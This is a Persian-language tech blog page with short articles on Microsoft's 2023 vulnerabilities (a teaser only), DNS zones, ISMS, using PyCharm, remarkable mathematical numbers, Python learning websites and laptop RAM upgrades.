اخبار فناوری و شبکه

تازه های شبکه و IT

اخبار فناوری و شبکه

تازه های شبکه و IT

جدیدترین آسیب پذیری های امنیتی 2023 در مایکروسافت

همانطور که تکنولوژی به تکامل خود ادامه می دهد، چشم انداز تهدیدات سایبری نیز تغییر می کند. همگام بودن با آخرین آسیب پذیری های امنیتی برای تیم های امنیتی و فناوری بسیار مهم است. در ادامه به مهم ترین آسیب پذیری های امنیتی سال 2023  مایکروسافت می پردازیم. 

ادامه مطلب ...

ایجاد و پیکربندی DNS Zone در ویندوز سرور 2022

نصب و پیکربندی DNS Zone در ویندوز سرور

Domain Name System یا به اختصار DNS یک سرویس اساسی است که نام‌ ها یا سرویس ‌ها را به آدرس‌ های IP و گاهی بالعکس تبدیل می‌کند. DNS یک سرویس کلیدی است که باید در هر شبکه ای اجرا شود. در واقع DNS  سرویسی است که دارای یک پایگاه داده از رکورد ها می باشد. اصلی ترین رکورد DNS که در بخش Forward Lookup Zone قرار دارد A record می باشد. کار Arecord تبدیل اسم به IPv4 می باشد  ادامه مطلب ...

سیستم مدیریت امنیت اطلاعات (ISMS) چیست؟

سیستم مدیریت امنیت اطلاعات (ISMS) چیست : پیشرفت سریع و هر لحظه در دنیای فناوری اطلاعات و ارتباطات باعث شده است نیاز به استقرار امنیت بیشتر از هر زمانی آشکار شود. همانقدر که فناوری های نوینی روی کار می آیند، اگر به امنیت آن توجه نشود، منجر به بروز خطرات و حوادث غیر قابل جبرانی خواهد شد. هر فرآیند تجاری مبتنی بر فناوری در معرض تهدیدات امنیتی و حریم خصوصی قرار دارد. فناوری های پیچیده قادر به مبارزه با حملات امنیت سایبری هستند، اما این ها کافی نیستند.

سازمان ها باید اطمینان حاصل کنند که فرآیندهای تجاری، سیاست ها و رفتار نیروی کار این خطرات را به حداقل می رسانند یا کاهش می دهند. آیا تاکنون به امنیت اطلاعاتی که دارید فکر کرده اید؟ این اطلاعات ممکن است مسندات کاغذی، ایمیل ها، فیلم ها، مکالمات جلسات و یا هر چیزی باشد. سیستم مدیریت امنیت اطلاعات (ISMS) به شما کمک می کند تا بتوانید در بالاترین سطح امنیت را برقرار کنید.  ادامه مطلب ...

آموزش کار با نرم افزار PyCharm

یکی  از پر کاربرد ترین و محبوب ترین زبان های برنامه نویسی، زبان برنامه نویسی پایتون “Python” میباشد. این زبان برنامه نویسی بسیار قدتمند بوده و دارای کتابخانه ای عظیم و البته رایگان است که دارای توابع برنامه نویسی آماده برای برنامه نویسان است. برنامه نویسی به زبان پایتون ساده است و هر فرد که کمی به برنامه نویسی آشنایی داشته باشد میتواند به سادگی کار با این زبان را یاد بگیرد. برای برنامه نویسی به زبان پایتون به یک نرم افزار نیاز دارید. برترین نرم افزار در این زمینه “PyCharm” میباشد که محصولی از کمپانی معروف “JetBrains” است. در این مقاله میخواهیم نحوه کار با این نرم افزار را برای شما شرح دهیم.
 
 
کار با نرم افزار PyCharm
 
آخرین نسخه از نرم افزار PyCharm را با استفاده از لینک درج شده در انتهای مطلب دانلود کرده و سپس آن را در سیستم تان نصب و اجرا کنید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
هم اکنون یا باید یک پروژه جدید بسازید و یا یک پروژه از قبل آماده را در نرم افزار باز کنید. ما در اینجا میخواهید یک پروه از قبل آماده، یعنی "کد منبع" (Source Code) یک نرم افزار که از قبل آماده شده را باز کنیم. بدین منظور دکمه ی “Open” را کلیک میکنیم.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
در پنجره کوچکی که باز میشود پوشه حاوی کد منبع را کلیک کنید تا هایلایت شود.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
PyCharm از کد منبعی که باز میکنید یک پروژه میسازد. پس از هایلات کردن پوشه “OK” را کلیک کنید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
آشنایی با محیط نرم افزار
 
پس از باز کردن هر پروژه با صفحه ای به شکل عکس زیر مواجه میشوید که در ادامه تمامی بخش های آن را برای شما شرح میدهیم:
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
1. Project Viewفایل های موجود در پروژه در این بخش نمایش داده میشوند.
 
2. Editorاین بخش، بخش ویرایش میباشد که کد ها را در آن مینویسید و ویرایش میکنید.
 
3. Navigation Barنوار ناوبری که بالای ویرایشگر قرار دارد.
 
4.  Left Gutterنوار عمودی سمت چپ ویرایشگر که به ناوبری در بین کد ها کمک فراوانی به برنامه نویس میکند.
 
5. Right Gutterنوار عمودی سمت راست ویرایشگر که کیفیت کد های شما را نمایش میدهد.
 
6. Tool Windowsبخش پایینی نرم افزار است که کار هایی نظیر مدیریت کد ها، جستجو برای کد ها، ناوبری بین کد ها و... در این بخش صورت میگیرند.
 
7. The Status Barوضعیت کلی پروژه شما در این بخش نمایش داده میشود.
 
همچنین در پایین سمت چپ رابط کاربری نرم افزار یک دکمه ی مربع خاکستری رنگ وجود دارد که با کلیک کردن بر روی آن منویی باز میشود که ابزار هایی در آن مشاهده میکنید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
شخصی سازی رابط کاربری
 
شما میتوانید رابط کاربری نرم افزار PyCharm را شخصی سازی کنید تا کار با آن برای شما راحت تر و همچنین لذت بخش تر شود. در این بخش از مطلب به راهنمایی در زمینه شخصی سازی کردن رابط کاربری نرم افزار میپردازیم.
 
 
- تغییر تم
 
به منظور تغییر تم نرم افزار ابتدا دکمه ی “File” را کلیک کنید، از داخل منویی که باز میشود گزینه ی “Settings” را کلیک کنید و در تنظیمات که باز میشود به بخش “Appearance and Behavior” بروید و سپس وارد بخش “Appearance” شوید. در این جا میتوانید تم نرم افزار را تغییر دهید.
 
 
- ویرایشگر
 
از طریق بخش “File | Settings | Editor” میتوانید تغییراتی در بخش های مختلف ویرایشگر ایجاد کنید.
 
 
- کد ها
 
برای شخصی سازی کردن استایل کد نویسی به مسیر “File | Settings | Editor | Code Style” بروید و سپس تغییرات دلخواه را اعمال کنید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
تکمیل کد ها
 
یکی از قابلیت های فوق العاده نرم افزار PyCharm که کمک فراوانی به صرفه جویی در وقت میکند، تکمیل خودکار کدها است. این قابلیت بدین گونه کار میکند که شما ابتدای چیزی را تایپ میکنید و سپس نرم افزار آن را تکمیل میکند.
 
این قابلیت به صورت هوشمند عمل کرده و کد هایی که تا به حال نوشته اید را بررسی و تجزیه و تحلیل میکند و کد ها را به درستی تکمیل میکند.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
مرتب نگاه داشتن کد ها
 
PyCharm همیشه در حالت مانیتور کردن و تجزیه و تحلیل کردن کد های شما میباشد و آن ها را صحیح و مرتب میکند. این نرم افزار ایرادات در کد نویسی را تشخیص داده و راه حل های ساده و کوتاه برای برطرف کردن آن ها به شما پیشنهاد میدهد.
 
هر زمان که PyCharm یک ایراد در کدنویسی، کد های پیچیده، نامرتب و... بیابد یک لامپ کوچک نمایش میدهد که با کلیک بر روی آن و یا فشرده همزمان کلید های ترکیبی “Alt + Enter” میتوانید مشکل یافت شده را حل کنید.
 
 
تولید خودکار کد
 
میتوانید از قابلیت “Code Generation” نرم افزار به منظور سرعت بخشیدن به کدنویسی استفاده کنید. برای فعال کردن این قابلیت ابتدا دکمه ی “The Code” و سپس “Generate” را کلیک کنید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
برای تولید خودکار چندین خط کد با استفاده از قالب های از پیش آماده به مسیر “Code | Insert Live Template” بروید و یا تنها کلید های ترکیبی “Ctrl + J” را به صورت همزمان بگیرید.
 
 
جستجو در بین کد ها
 
زمانی که در حال کار بر روی پروژه ی عظیمی هستید و یا بر روی کد های نوشته شده توسط فرد دیگری کار میکنید، یافتن چیزی که به دنبالش هستید میتواند بسیار سخت باشد. در این مواقع بهترین کاری که میتوانید انجام دهید این است که از جستجو استفاده کنید.
 
 
جستجوی ساده
 
به منظور جستجو در بین کد ها میتوانید از کلید های ترکیبی “Ctrl + F” استفاده نمایید.
 
 
ناوبری در پروژه
 
با استفاده از کلید های ترکیبی “Ctrl + N” و همچنین “Ctrl + Shift + N” استفاده کنید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
 
- جستجو در بین همه چیز
 
به منظور جستجو در بین همه چیز در یک پروژه عظیم میتوانید از قابلیت “Search Everywhere” استفاده کنید. برای فعال کردن این قابلیت دو بار کلید “Shift” را فشار دهید.
 
آموزش کار با نرم افزار JetBrains PyCharm
 
همچنین اگر به زبان NET. برنامه نویسی میکنید، پیشنهاد میکنیم از نرم افزار ReSharper استفاده کنید:
 
 
 
جمع بندی
 
PyCharm بهترین نرم افزار برای برنامه نویسی به زبان پایتون میباشد و پیشنهاد میدهیم به هر برنامه نویسی که با زبان پایتون برنامه نویسی میکند از این نرم افزار استفاده کند.
 
موفق و شاد باشید.
 
 

 

۱۰ عدد شگفت‌‌انگیز دنیای ریاضیات

بسیاری بر این باورند که عدد پی (π) به‌‌خاطر دقت محاسباتی بی‌‌پایان آن، احتمالا لایق عنوان شگفت‌‌انگیزترین عدد دنیای ریاضیات خواهد بود؛ اما به‌‌عقیده‌‌ی ریاضیدانان، اعداد طلایی و ناشناخته‌‌ی دیگری نیز وجود دارند که هرگز کم از رقیب دیرین خود ندارند.

اگر از شیفتگان دنیای ریاضیات هستید، پس احتمالا روز ۱۴ مارس (برابر‌‌با ۲۳ اسفند) به‌‌گوشتان آشناست. این روز، به‌‌عنوان روز جهانی شگفت‌‌انگیزترین و غیرمعقول‌‌ترین عدد دنیا یعنی عدد پی (π) شناخته می‌‌شود. اما این عدد چیست؟ پی را به‌‌سادگی می‌‌توان نسبت محیط یک دایره به قطر آن دانست. این عدد را هرگز نمی‌‌توان کاملا به‌‌صورت اعشاری نوشت. شگفت‌‌انگیزتر آنکه پی، یک عدد متعالی یا غیرجبری است؛ بدین‌معنا که هیچ معادله‌ی چندجمله‌ای با ضرایب گویا را نمی‌توان یافت که ریشه‌ی آن عدد پی باشد.

weird numbers / اعداد شگفت انگیز

اما این عدد در خیل عظیم اعداد شگفت‌‌انگیز طبیعت یک استثنا نبوده و نیست. برای بسیاری از ریاضیدانان، اعداد جالب‌‌تری وجود دارد که نسبت‌‌به ثابت دایره، از جذابیت بالاتری برخوردار هستند. در اینجا سعی کرده‌‌ایم فهرستی از اعداد شگفت‌‌انگیزی را برایتان نقل کنیم که از نگاه ریاضیدانان دست‌‌کمی از عدد پی ندارند.

تاو (Tau)

weird numbers / اعداد شگفت انگیز

فکر می‌‌کنید چه‌‌چیزی می‌‌تواند جذاب‌‌تر از یک عدد پی باشد؟ شاید مسخره‌‌ترین پاسخ این باشد که بگوییم: دو تا عدد پی! ولی این واقعیت دارد. عدد تاو یا دور (Tau)، مقداری معادل‌با دوبرابر مقدار پی است؛ یعنی چیزی در حدود ۶.۲۸.

جان بائز، ریاضیدانی از دانشگاه کالیفرنیا در ریورساید می‌گوید:

استفاده از تاو می‌‌تواند نسبت‌‌به پی، فرمول‌‌ها را برایمان واضح‌‌تر و منطقی‌تر کند. تمرکز بیشتر ما روی عدد π نسبت‌‌به 2π، تنها ناشی از یک اتفاق تاریخی است.

بائز می‌‌گوید درحقیقت، تاو آن عددی است که در مهم‌ترین فرمول‌‌های ما دیده می‌‌شود. پی درواقع ارتباط میان محیط و قطر آن را مشخص می‌‌کند، درحالی‌‌که تاو، بیانگر ارتباط میان محیط دایره و شعاع آن است و نکته اینجا است که بسیاری از ریاضیدانان بر این عقیده‌‌اند که رابطه‌‌ی دوم بسیار مهم‌تر است. عدد تاو به معادلاتی ظاهرا غیرمرتبط ظاهری متقارن می‌‌بخشد؛ معادلاتی نظیر مساحت دایره یا معادلات توصیف‌گر انرژی جنبشی و کشسانی.

اما در سالگرد گرامیداشت عدد پی، قرار نیست عدد تاو به‌‌دست فراموشی سپرده شود. بنابر تصمیم‌گیری انجام‌گرفته ازسوی مؤسسه‌‌ی فناوری ماساچوست، تاو نیز روز مخصوص‌‌به خودش را خواهد داشت: ۲۸ ژوئن.

پایه‌‌ی لگاریتم طبیعی

weird numbers / اعداد شگفت انگیز

عدد جالب دیگری که در اینجا قصد معرفی آن را داریم، پایه‌‌ی لگاریتم طبیعی یا به‌‌اختصار عدد e است که ریاضیدانی سوئیسی لئونارد اویلر در قرن ۱۸ میلادی آن را کشف کرد. این عدد شگفت‌آور با مقدار تقریبی ۲.۷۱۸، ممکن است به‌‌اندازه‌‌ی عدد پی شهرت نداشته باشد؛ ولی عدد e نیز مانند رقیب خود، دارای یک روز مخصوص‌‌به‌‌خود است. اهالی علم، روز ۷ فوریه را برای گرامیداشت این عدد عجیب انتخاب کرده‌‌اند.

پایه‌‌ی لگاریتم طبیعی اغلب در معادلات مربوط‌به لگاریتم‌‌ها، رشد نمایی و اعداد مختلط استفاده می‌شود. کیت دولین، مدیر پروژه‌‌ی ریاضی اوت‌‌ریچ دانشگاه استنفورد در دانشکده تحصیلات تکمیلی بر این باور است که:

[این عدد] تعریف فوق‌العاده‌ای دارد که بنابر آن، تابع نمایی y=e^x در هر نقطه مقداری برابر با شیب خود دارد. به‌‌عبارت دیگر، اگر مقدار یک تابع در یک نقطه برابر با ۷.۵ باشد، میزان شیب (یا مشتق) آن در آن نقطه نیز برابر با ۷.۵ خواهد بود. این عدد نیز درست مانند دیگر رقبای خود کاربرد فراوانی در ریاضیات، فیزیک و مهندسی دارد.

عدد موهومی i

weird numbers / اعداد شگفت انگیز

عدد شگفت‌‌انگیزی دیگری نیز وجود دارد که در غرابت کم از عدد پی ندارد: عدد i.

این عدد که جذر ۱- محسوب می‌‌شود، درحقیقت اصلا نباید وجود خارجی داشته باشد؛ چراکه اگر در خلال این سال‌ها، اندک معلوماتی از قوانین پایه‌‌ی ریاضیات در ذهنتان باقی مانده باشد، خوب می‌‌دانید که هرگز نمی‌‌توان از اعداد منفی جذر گرفت.

یوجیبا چنگ، ریاضیدان دانشکده هنر شیکاگو این‌‌گونه می‌‌گوید:

بااین‌حال، اگر ما این قانون را بشکنیم، قادر خواهیم بود اعداد موهومی را اختراع کنیم که همانند اعداد مختلط، اعدادی زیبا و درعین‌حال مفید هستند. دراین‌میان، i یک عدد به‌‌شدت عجیب است؛ چراکه عدد ۱- دارای دو ریشه‌‌ی دوم است: یکی i و دیگری i-. اما درواقع نمی‌‌توان تفاوت میان این دو ریشه را تشخیص داد. از این‌‌رو، ریاضیدانان، تنها یکی از این ریشه‌‌ها را به‌‌عنوان i برگزیدند و دیگری را i-. این بسیار شگفت انگیز و خارق‌‌العاده است.

بد نیست بدانید اعداد مختلط، اعدادی هستند که می‌توان آن‌‌ها را به‌‌صورت مجموع دو بخش از عدد حقیقی و عدد موهومی بیان کرد.

i به‌‌توان i

weird numbers / اعداد شگفت انگیز

شاید باور کردن آن سخت باشد که وضعیت عدد i می‌‌تواند حتی شگفت‌‌انگیز‌‌تر از آن چیزی باشد که اکنون به نظر می‌‌رسد. برای مثال، شما می‌توانید عدد i را به به‌‌توان خود i برسانید. به عبارت دیگر، ریشه‌‌ی دوم ۱- را به‌توان ریشه‌‌ی دوم ۱- برسانید!

دیوید ریچسون، پروفسور ریاضیات در کالج دیکینسون در پنسیلوانیا و نویسنده‌‌ی کتاب «افسانه‌‌‌‌های غیرممکن: جست‌وجو برای حل مسائل ریاضی دوران باستان» (انتشارات دانشگاه پرینستون) می‌‌گوید:

در نگاه اول، این عدد ممکن است موهومی‌‌ترین عدد ممکن به‌‌نظر برسد؛ عددی موهومی که خود به‌‌توان عددی موهومی رسیده است. اما درحقیقت، همان‌‌طور که لئونارد اویلر طی مقاله‌‌ای در سال ۱۷۴۶ نوشته است: « این یک عدد حقیقی است!»

پیدا کردن مقدار واقعی i به‌‌توان i، نیازمند بازترکیب فرمول معروف اویلر براساس عدد گنگ e، عدد موهومی i و سینوس و کسینوس یک زاویه‌‌ی مشخص است. هنگامی که فرمول یک زاویه‌‌ی ۹۰ درجه را حل می‌کنیم ( که می‌توان آن را به‌‌شکل π/2 نیز نشان داد)، می‌توان معادله را به‌‌گونه‌‌ای ساده کرد تا نشان دهد که i به‌‌توان i برابر است با e به‌‌توان 2/π-.

این محاسبات کمی گیج‌‌کننده به‌‌نظر می‌‌رسد؛ بااین‌حال نتیجه‌‌ی این معادله (در زاویه‌‌ی ۹۰ درجه) نهایتا برابر خواهد بود با ۰.۲۰۷ که عددی کاملا حقیقی است. اگر حوصله‌‌ی سروکله‌‌زدن با نحوه‌‌ی این محاسبات را دارید، می‌‌توانید به این آدرس سری بزنید. ریچسون می‌‌گوید:

همان‌‌طور که اویلر اشاره کرده، i به‌‌توان i دارای یک مقدار واحد نیست. بااین‌حال، رسیدن به این تعداد بی‌‌نهایت از پاسخ‌‌های ممکن، بستگی به آن دارد که معادله را در چه زاویه‌‌ای حل می‌‌کنید.

با این حجم پیچیدگی، بی‌‌دلیل نیست که نمی‌‌توان به اختصاص یک روز خاص برای «i به‌‌توان i» در آینده چندان امید بست.

عدد اول بلفیجور

weird numbers / اعداد شگفت انگیز

عدد اول بلفیجور، عدد اولی واروخوانه است که به‌‌صورت ۶۶۶ در میان ۱۳ عدد صفر و یک عدد یک در طرفین نوشته می‌شود (اعداد واروخوانه یا جناس قبل، به اعدادی اطلاق می‌‌شود که خواندن آن از دوطرف یکسان باشد). این عدد نحس (یا به‌تعبیری شیطانی) را می‌توان به شکل ۱۰۰۰۰۰۰۰۰۰۰۰۰۰۶۶۶۰۰۰۰۰۰۰۰۰۰۰۰۰۱ نوشت.

کلیف پیکاور، دانشمند و نویسنده‌‌ای بود که این عدد شیطانی را بانام بلفیجور (یکی از دیوهای هفت‌‌گانه‌‌ی دوزخ) نام‌‌گذاری کرد و شهرت فراوانی به آن بخشید.

این عدد ظاهرا نماد شیطانی مختص‌‌به خودش را دارد که شبیه نماد وارونه‌‌ی عدد پی است. مطابق با اطلاعات درج‌شده در وب‌‌سایت Pickover، این نماد از یک نشان دیده‌‌شده در دست‌نوشته‌‌ی مرموز ووینیچ اقتباس شده است. این دست‌‌نوشته‌‌ی مشهور مجموعه‌ای از تصاویر و متون عجیب است که گویی کسی از آن سر در نمی‌‌آورد.

2aleph_0

weird numbers / اعداد شگفت انگیز

دبلیو. هوگ وودین، ریاضیدانی از دانشگاه هاروارد سال‌‌هایی طولانی از وقت خود را صرف تحقیق درمورد اعداد بی‌‌نهایت اختصاص داده است و بنابراین جای تعجبی هم نداشت که یکی از همین اعداد بی‌‌نهایت را به‌‌عنوان عدد دلخواه‌‌ی خود انتخاب کند: 2aleph_0 یا ۲ به‌‌توان aleph-naught.

اعداد آلِف معمولا برای توصیف اندازه‌‌ی مجموعه‌‌های نامحدود مورد استفاده قرار می‌‌گیرند (مجموعه، به هر دسته‌‌ از اشیای متمایز در ریاضیات اطلاق می‌‌شود). یه این ترتیب، مثلا اعداد ۲، ۴ و ۶ می‌توانند باهم یک مجموعه با اندازه‌‌ی ۳ را تشکیل دهند. در مورد اینکه چرا وودین این عدد را انتخاب کرده، خود او می‌‌گوید:

اگر بتوانیم درک کنیم که  2aleph_0 برابر با خود aleph_0 نیست (قضیه‌‌ی کانتور)، آن‌‌گاه خواهیم دانست که اندازه‌‌های متفاوتی از بی‌‌نهایت وجود دارند. این همان مفهومی است که عبارت 2aleph_0  را برایمان خاص می‌‌سازد.

به‌‌عبارت دیگر، همیشه عددی بزرگتر از آنچه می‌‌پنداریم، وجود خواهد داشت. تعدادی نامحدود از اعداد اصلی بی‌‌نهایت وجود دارند و بنابراین هرگز نمی‌‌توان مفهومی را به‌‌عنوان «بزرگ‌ترین عدد اصلی»  تعریف کرد.

ثابت آپری

weird numbers / اعداد شگفت انگیز

الیور نیل ریاضیدانی از هاروارد می‌‌گوید:

اگر بخواهم عددی را به‌‌عنوان عدد مورد علاقه‌‌ی خود انتخاب کنم،  این عدد مسلما، ثابت آپری یا (Zeta(3 می‌‌بود؛ چراکه هنوز رازورمزهای بسیاری درمورد آن وجود دارد.

در سال ۱۹۷۹، ریاضیدانی فرانسوی بانام راجر آپری، ثابت کرد که مقداری که بعدها به‌‌عنوان ثابت آپری شناخته شد، عددی گنگ است. این عدد با ۱.۲۰۲۰۵۶۹ آغاز می‌‌شود و اعشار آن تا بی‌‌نهایت ادامه پیدا می‌‌کند. این ثابت همچنین به‌صورت مقدار تابع (Zeta(3 نیز شناخته می‌‌شود که در آن عدد ۳ به‌‌عنوان ورودی تابع زتا (تابعی کشف‌‌شده از سوی ریمن) تعیین شده است.

یکی از بزرگ‌ترین مسائل دنیای ریاضی، فرضیه‌‌ی ریمن است که به پیش‌بینی شرایطی می‌‌پردازد که در آن، تابع زتای ریمن برابر با صفر می‌‌شود؛ فرضیه‌‌ای که اگر درست از آب درآید، این امکان را به ریاضیدانان خواهد داد تا دریابند اعداد اول چگونه توزیع شده‌‌اند. دیوید هیلبرت، ریاضیدان معروف قرن بیستم درمورد فرضیه‌‌ی ریمن می‌‌گوید:

 اگر بعد از هزار سال هم از خواب بیدار می‌‌شدم، باز هم اولین پرسش من این بود که: «آیا فرضیه ریمان ثابت شده‌است؟»

حال چه‌‌چیزی ثابت آپری را تااین‌‌حد برابمان جذاب کرده است؟ امروزه روشن شده است که ثابت آپری جایگاه ویژه‌‌ای در علم فیزیک دارد، به‌‌خصوص نقش آن در معادلات حاکم بر نیروی مغناطیسی الکترون‌‌ و جهت تکانه‌‌ی زاویه‌ای آن.

عدد یک

weird numbers / اعداد شگفت انگیز

اد لتزر، ریاضیدانی از دانشگاه تمپل در فیلادلفیا درمورد شگفت‌‌انگیزترین عدد شناخته‌‌شده، پاسخی تجربی ارائه کرده است:

من فکر می‌کنم این، پاسخی کسالت‌‌بار است؛ اما من باید عدد یک را به‌‌عنوان عدد دلخواه‌‌ خود برگزینم؛ چراکه ازسویی هم یک عدد است و ازسوی دیگر، درباره‌‌ی بسیاری از زمینه‌های انتزاعی، نقش‌‌های متفاوتی ایفا می‌‌کند.

یک تنها عددی است که تمامی اعداد دیگر بدان بخش‌پذیر هستند. همچنین یک تنها عددی است که تنها بر یک عدد مثبت (یعنی خودش) بخش‌‌پذیر است و یک تنها عددی است که نه عددی اول محسوب می‌‌شود و نه مرکب.

در ریاضیات و مهندسی، اغلب اعداد به‌‌صورت مقادیر میان صفر و یک بیان می‌‌شوند. عبارت «صددرصد» تنها یک عبارت فانتزی برای گفتن عدد یک است. یک، عددی جامع و کامل است.

و البته در تمامی علوم بشری، یک به‌‌عنوان واحدی بنیادین شناخته می‌‌شود. مثلا گفته می‌‌شود یک پروتون تنها باری به‌‌اندازه‌‌ی ۱+ دارد. در منطق دودویی، یک به‌‌معنای «بله» است و همچنین یک به‌‌عنوان عدد اتمی سبک‌ترین عنصر دنیا شناخته شده است و نهایتا یک به‌‌عنوان ابعاد یک خط مستقیم نیز تلقی می‌‌شود.

اتحاد اویلر

weird numbers / اعداد شگفت انگیز

اتحاد اویلر که درواقع یک معادله است، به‌‌معنای واقعی کلمه، جواهری در ریاضیات به‌‌حساب می‌‌آید. حداقل شاید بتوان گفت این نظری است که ریچارد فینمن، فیزیکدان معاصر درمورد این معادله دارد .این معادله همچنین از لحاظ زیبایی با غزلی از شکسپیر قیاس شده است.

در یک کلام می‌‌توان این‌‌گونه گفت که اتحاد اویلر، پل ارتباطی میان مهم‌‌ترین ثابت‌های ریاضی جهان است: عدد پی، لگاریتم طبیعی و عدد موهومی i. دولین می‌گوید:

[این معادله] توانسته سه ثابت مهم را با مفهوم عدد صفر و مفاهیم ریاضیات پایه به یکدیگر پیوند دهد: e^{i*Pi} + 1 = 0

معرفی برترین سایت های آموزش زبان برنامه نویسی پایتون

                        یکی از محبوبترین زبان های برنامه نویسی در دهه گذشته زبان پایتون است که طراحان وب ، برنامه نویسان بازیهای رایانه ای ، برنامه نویسان برنامه های دسکتاپ و... از این زبان برنامه نویسی قدرتمند استفاده میکنند. زبان پایتون بسیار آسان و به زبان انسان نزدیک است چنانچه میخواهید برنامه نویسی پایتون را فرا بگیرید در این مقاله قصد داریم تا بهترین منابع آموزشی آنلاین لاتین و فارسی که کاملا رایگان هستند را معرفی کنیم.

 link  برای ورود به سایت بر روی عنوان کلیک کنید  


1) How to Think Like a Computer Scientist (لاتین)

How to Think Like a Computer Scientist

یکی از بهترین سایت ها برای یادگیری زبان پایتون وب سایت interactivepython است که برای افراد مبتیدی بسیار مناسب است.
بخش های آموزشی به چند سرفصل اصلی تقسیم شده که در هر فصل درس های مختلفی وجود دارد ، ساختار درختی دروس از آسان به سخت گسترش خواهد یافت.
همچنین این وب سایت دارای یک کامپایلر زیان پایتون است که به شما برای اجرای کدهای آموزشی کمک خواهد کرد.


2) The Official Python Tutorial (لاتین)

The Official Python Tutorial

یکی دیگر از منابع خوب برای یادگیری زبان پایتون سایت رسمی Python است که دروس مختلف و مفیدی را به علاقه مندان به این زبان ارائه میدهد.
در این وبسایت مباحث آموزشی قدم به قدم به علاقه مندان فرا داده میشود ، قالبندی سایت نیز ساده و و واضح است.


3) Byte of Python (لاتین)

Byte of Python

این سایت مجموعه ای از درسهای آموزشی برای زبان پایتون را ارائه میدهد. قسمت اول آموزش سایت راه اندازی یک مترجم پایتون در رایانه را شرح خواهد داد.


4) LearnPython (لاتین ، فارسی)

LearnPython

learnpython یکی دیگر از منایع عالی برای یادگیری زبان پایتون است که با ارائه مثالهایی سعی میکند زبان برنامه نویسی پایتون را به علاقه مندان فرا دهد.
این وبسیات به غیر از زبان پایتون زبان های دیگر را برای آموزش ارائه کرده است. از نکات مثبت این وبسایت این است که به دو صورت فارسی و انگلیسی ارائه میشود.


5) Learn X in Y Minutes: Python 3 (لاتین)

Learn X in Y Minutes: Python 3

اگر شما پیش زمینه ای از زبان برنامه نویسی دارید ولی قصد دارید تا زبان پایتون را برای یادگیری آغاز کنید این وب سایت میتوانید بسیار مفید باشد.
تمامی قالب ها و دستورات پایتون در این وبسایت به خوبی توضیح داده شده به طوری که کمتر از 15 دقیقه میتوانید پایتون را فرا بگیرید.


6) python.coderz (فارسی)

python.coderz

یکی از وب سایت های آموزش پایتون که خوب مباحث آموزش پیاتون را ارائه میکند وب سایت python.coderz.ir است.
دروس این وب سایت در حال گسترش و تکمیل شدن هستند.
این وبسایت پیش گفتاری از پیاتون را شرح داده سپس به آموزش نصب پایتون پرداخته و سایر دستورات را ارائه میکند.


7) مجله آموزشی راکت (فارسی) 

مجله آموزشی راکت

در وب سایت رایکت مجموعه آموزش های خوبی برای پایتون را مشاهده کردیم که با بررسی های انجام شده میتواند برای علاقمندان به فراگیری زبان پایتون مناسب باشد.
در این وب سایت آموزش هایی در قالب قسمت های مختلف آموزشی قرار گرفته است.


8) سایت iLikePHP (فارسی)

سایت iLikePHP

این سایت با عنوان مرجع آموزش برنامه نویسی و برنامه نویسی تحت وب فعالیت میکند که در مورد برنامه نویسی پایتون آموزش های خوب و مناسبی ارائه کرده است.


9) سخت افزار مگ (فارسی)

سخت افزار مگ

حدود 19 سری از آموزش های پایتون در این وبسایت قرار گرفته که به صورت آنلاین قابل استفاده هستند.

بیشتر بخوانید :

راهنمای جامع ارتقای رم لپ تاپ (+ آموزش تصویری)

ارتقای رم لپ تاپ همواره یکی از راهکارهای افزایش کارایی این دستگاه‌های همراه بوده است. در این نوشتار به آموزش ارتقای حافظه رم لپ‌تاپ همراه با بررسی بهبود کارایی می‌پردازیم.

یک تفکر قدیمی در مورد لپ‌تاپ وجود دارد که که بر اساس آن، لپ‌تاپ‌ها دستگاه‌های غیرقابل ارتقا معرفی می‌شوند. اگر این تفکر درست باشد، تنها راه خلاص شدن از شر یک لپ‌تاپ کُند، تعویض آن خواهد بود؛ اما خوشبختانه این مسئله در مورد تمام قطعات لپ‌تاپ صادق نیست. در بسیاری از موارد، می‌توانیم با افزایش حافظه‌ی رم، سرعت عملکرد لپ‌تاپ خسته‌ی خود را بهبود ببخشیم.

آیا در همه‌ی لپ‌تاپ‌ها قابلیت ارتقای رم وجود دارد؟ خیر! لپ‌تاپ‌های مختلف، از طراحی‌های بسیار متفاوتی استفاده می‌کنند و قابلیت دسترسی و تعویض قطعات در آن‌ها، یکسان نیست. بنابراین هیچ گزاره‌ی دقیقی وجود ندارد که بر اساس آن، یک محدوده‌ی خاص از لپ‌تاپ‌ها را ارتقاپذیر و محدوده‌ی دیگر را غیر قابل ارتقا بنامیم. اما به طور کلی می‌توانیم بگوییم معمولاً لپ‌تاپ‌های ارزان‌قیمت‌تر، نسبت به مدل‌های لوکس و گران، قابلیت دسترسی به قطعات، ارتقا و تعمیر بیشتری را در اختیار کاربر قرار می‌دهند.

اگر بخواهیم جسورانه‌تر بیان کنیم، می‌توانیم بگوییم که هرچه قیمت دستگاه‌ها بالاتر می‌رود، پلمپ‌ها سفت و سخت‌تر و دسترسی به قطعات، دشوارتر می‌شود. پس هدف عمده‌ی ما در این مقاله، می‌تواند محصولات متوسط به پایین بازار باشد که طراحی ماژولارتر و قطعات قابل دسترس‌تری دارند.

چگونه بفهمیم لپ‌تاپ ما قابلیت ارتقای رم دارد؟
پیش از اینکه دست به جیب شوید و یک رم جدید برای لپ‌تاپ خود تهیه کنید، مسلماً نیاز به این خواهید داشت که بدانید آیا لپ‌تاپ شما توانایی پذیرش این قطعه‌ی جدید را دارد یا خیر. بدین منظور باید بدانید که آیا دستگاه شما شکاف خالی برای قرار دادن رم جدید دارد؟ علاوه بر راهکار باز کردن فیزیکی درپوش‌‌های لپ‌تاپ و مشاهده عینی وضعیت اسلات‌های رم که ممکن است دردسرهای خاص خود را داشته باشد، قابلیت رایگانی که شرکت کروشیال در اختیار کاربران قرار داده، در این زمینه به شما کمک خواهد کرد.

